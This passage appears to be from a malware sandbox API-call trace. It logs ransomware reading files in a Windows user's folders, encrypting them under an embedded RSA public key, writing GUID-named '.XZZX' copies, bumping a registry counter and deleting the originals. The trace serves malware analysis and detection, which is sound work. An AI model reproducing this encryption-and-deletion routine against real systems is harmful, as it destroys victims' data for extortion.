lpOverlapped=0x0) returned 1 [0127.960] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x11f [0127.960] WriteFile (in: hFile=0x644, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x16, lpOverlapped=0x0) returned 1 [0127.960] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x135 [0127.960] WriteFile (in: hFile=0x644, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0127.960] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x13a [0127.960] SetErrorMode (uMode=0x1) returned 0x1 [0127.960] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0127.960] OutputDebugStringW (lpOutputString="end") [0127.960] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0127.960] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0127.960] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3d1eb40) returned 1 [0127.961] CryptImportPublicKeyInfo (in: hCryptProv=0x3d1eb40, dwCertEncodingType=0x1, pInfo=0x3d0dfd8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0e008*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0e010*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3cde2d8) returned 1 [0127.961] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0127.962] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0127.962] CryptEncrypt (in: hKey=0x3cde2d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0127.962] CryptEncrypt (in: hKey=0x3cde2d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3d1ebc8*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3d1ebc8*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0127.962] WriteFile (in: hFile=0x644, lpBuffer=0x3d1ebc8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3d1ebc8*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0127.962] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0127.962] WriteFile (in: hFile=0x644, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0127.962] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0127.962] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0127.962] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x648) returned 0x0 [0127.963] RegQueryValueExW (in: hKey=0x648, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0xa2, lpcbData=0x420dfdc*=0x4) returned 0x0 [0127.963] RegCloseKey (hKey=0x648) returned 0x0 [0127.963] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x648) returned 0x0 [0128.019] RegSetValueExW (in: hKey=0x648, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0xa3, cbData=0x4 | out: lpData=0x420dfec*=0xa3) returned 0x0 [0128.019] RegCloseKey (hKey=0x648) returned 0x0 [0128.019] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0128.020] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0128.020] CloseHandle (hObject=0x644) returned 1 [0128.021] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0128.021] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0128.022] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini")) returned 1 [0128.022] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini")) returned 0 Thread: id = 427 os_tid = 0x9bc [0127.957] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0127.957] lstrcpyW (in: lpString1=0x434f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0127.957] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0127.957] SetErrorMode (uMode=0x1) returned 0x1 [0127.957] lstrcpyW (in: lpString1=0x434f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0127.957] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0x51177af2, Data2=0xe951, Data3=0x4aaa, Data4=([0]=0xae, [1]=0x7f, [2]=0x15, [3]=0x83, [4]=0xa0, [5]=0xc, [6]=0x63, [7]=0x0))) returned 0x0 [0127.957] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned 54 [0127.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0127.957] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\07542892440C59CA51177AF248413E12.XZZX") returned 80 [0127.957] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0127.958] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini", dwFileAttributes=0x20) returned 1 [0127.984] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x648 [0127.984] ReadFile (in: hFile=0x648, lpBuffer=0x3ca2788, nNumberOfBytesToRead=0x20c, lpNumberOfBytesRead=0x434e418, lpOverlapped=0x0 | out: lpBuffer=0x3ca2788*, lpNumberOfBytesRead=0x434e418*=0x20c, lpOverlapped=0x0) returned 1 [0127.985] CloseHandle (hObject=0x648) returned 1 [0127.985] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40f0000 [0127.985] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4350000 [0127.986] SetErrorMode (uMode=0x1) returned 0x1 [0127.986] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0127.986] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3d1ec50) returned 1 [0127.988] CryptGenKey (in: hProv=0x3d1ec50, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cde258) returned 1 [0128.231] CryptExportKey (in: hKey=0x3cde258, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e41c | out: pbData=0x0*, pdwDataLen=0x434e41c*=0x94) returned 1 [0128.231] CryptExportKey (in: hKey=0x3cde258, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4350000, pdwDataLen=0x434e41c | out: pbData=0x4350000*, pdwDataLen=0x434e41c*=0x94) returned 1 [0128.231] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0128.232] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0128.232] CryptDestroyKey (hKey=0x3cde258) returned 1 [0128.232] CryptReleaseContext (hProv=0x3d1ecd8, dwFlags=0x0) returned 0 [0128.232] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\07542892440C59CA51177AF248413E12.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\07542892440c59ca51177af248413e12.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x638 [0128.232] WriteFile (in: hFile=0x638, lpBuffer=0x3ca2788*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3ca2788*, lpNumberOfBytesWritten=0x434e438*=0x20c, lpOverlapped=0x0) returned 1 [0128.233] SetFilePointer (in: hFile=0x638, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x20c [0128.233] WriteFile (in: hFile=0x638, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0128.233] SetFilePointer (in: hFile=0x638, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x211 [0128.233] WriteFile (in: hFile=0x638, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e438*=0x16, lpOverlapped=0x0) returned 1 [0128.233] SetFilePointer (in: hFile=0x638, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x227 [0128.233] WriteFile (in: hFile=0x638, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0128.234] SetFilePointer (in: hFile=0x638, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x22c [0128.234] SetErrorMode (uMode=0x1) returned 0x1 [0128.234] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0128.234] OutputDebugStringW (lpOutputString="end") [0128.234] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0128.234] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0128.234] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x3d1ed60) returned 1 [0128.235] CryptImportPublicKeyInfo (in: hCryptProv=0x3d1ed60, dwCertEncodingType=0x1, pInfo=0x3d0e178*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0e1a8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0e1b0*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: phKey=0x434d3ec*=0x3cde258) returned 1 [0128.235] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0128.235] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0128.235] CryptEncrypt (in: hKey=0x3cde258, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0128.236] CryptEncrypt (in: hKey=0x3cde258, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3d1ede8*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3d1ede8*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0128.236] WriteFile (in: hFile=0x638, lpBuffer=0x3d1ede8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3d1ede8*, lpNumberOfBytesWritten=0x434e438*=0x80, lpOverlapped=0x0) returned 1 [0128.236] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0128.236] WriteFile (in: hFile=0x638, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0128.236] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0128.236] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0128.236] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x654) returned 0x0 [0128.236] RegQueryValueExW (in: hKey=0x654, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0xa3, lpcbData=0x434dfdc*=0x4) returned 0x0 [0128.236] RegCloseKey (hKey=0x654) returned 0x0 [0128.236] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x654) returned 0x0 [0128.236] RegSetValueExW (in: hKey=0x654, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0xa4, cbData=0x4 | out: lpData=0x434dfec*=0xa4) returned 0x0 [0128.237] RegCloseKey (hKey=0x654) returned 0x0 [0128.237] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0128.237] VirtualFree (lpAddress=0x4350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0128.237] CloseHandle (hObject=0x638) returned 1 [0128.238] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0128.239] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0128.239] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini")) returned 1 [0128.240] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini")) returned 0 Thread: id = 428 os_tid = 0x9c0 [0128.160] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0128.160] lstrcpyW (in: lpString1=0x420f460, lpString2="Everywhere.search-ms" | out: lpString1="Everywhere.search-ms") returned="Everywhere.search-ms" [0128.160] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0128.160] SetErrorMode (uMode=0x1) returned 0x1 [0128.160] lstrcpyW (in: lpString1=0x420f860, lpString2="Everywhere.search-ms" | out: lpString1="Everywhere.search-ms") returned="Everywhere.search-ms" [0128.160] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xaa7ce5bc, Data2=0xa70a, Data3=0x46fc, Data4=([0]=0x80, [1]=0xf3, [2]=0x41, [3]=0x76, [4]=0x4, [5]=0x62, [6]=0x56, [7]=0x32))) returned 0x0 [0128.160] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned 63 [0128.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0128.160] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\22BE9D582E5129D8AA7CE5BC32720E20.XZZX") returned 80 [0128.160] StrStrW (lpFirst="Everywhere.search-ms", lpSrch="XZZX") returned 0x0 [0128.160] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms", dwFileAttributes=0x20) returned 1 [0128.161] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x638 [0128.161] ReadFile (in: hFile=0x638, lpBuffer=0x3c40ee0, nNumberOfBytesToRead=0xf8, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3c40ee0*, lpNumberOfBytesRead=0x420e418*=0xf8, lpOverlapped=0x0) returned 1 [0128.161] CloseHandle (hObject=0x638) returned 1 [0128.162] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0128.162] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0128.162] SetErrorMode (uMode=0x1) returned 0x1 [0128.162] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0128.162] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3d1ecd8) returned 1 [0128.166] CryptGenKey (in: hProv=0x3d1ecd8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cde1d8) returned 1 [0128.293] CryptExportKey (in: hKey=0x3cde1d8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0128.293] CryptExportKey (in: hKey=0x3cde1d8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0128.293] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0128.294] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0128.294] CryptDestroyKey (hKey=0x3cde1d8) returned 1 [0128.294] CryptReleaseContext (hProv=0x3d1ecd8, dwFlags=0x0) returned 0 [0128.294] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\22BE9D582E5129D8AA7CE5BC32720E20.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\22be9d582e5129d8aa7ce5bc32720e20.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x650 [0128.294] WriteFile (in: hFile=0x650, lpBuffer=0x3c40ee0*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3c40ee0*, lpNumberOfBytesWritten=0x420e438*=0xf8, lpOverlapped=0x0) returned 1 [0128.295] SetFilePointer (in: hFile=0x650, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xf8 [0128.295] WriteFile (in: hFile=0x650, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0128.295] SetFilePointer (in: hFile=0x650, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xfd [0128.295] WriteFile (in: hFile=0x650, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, 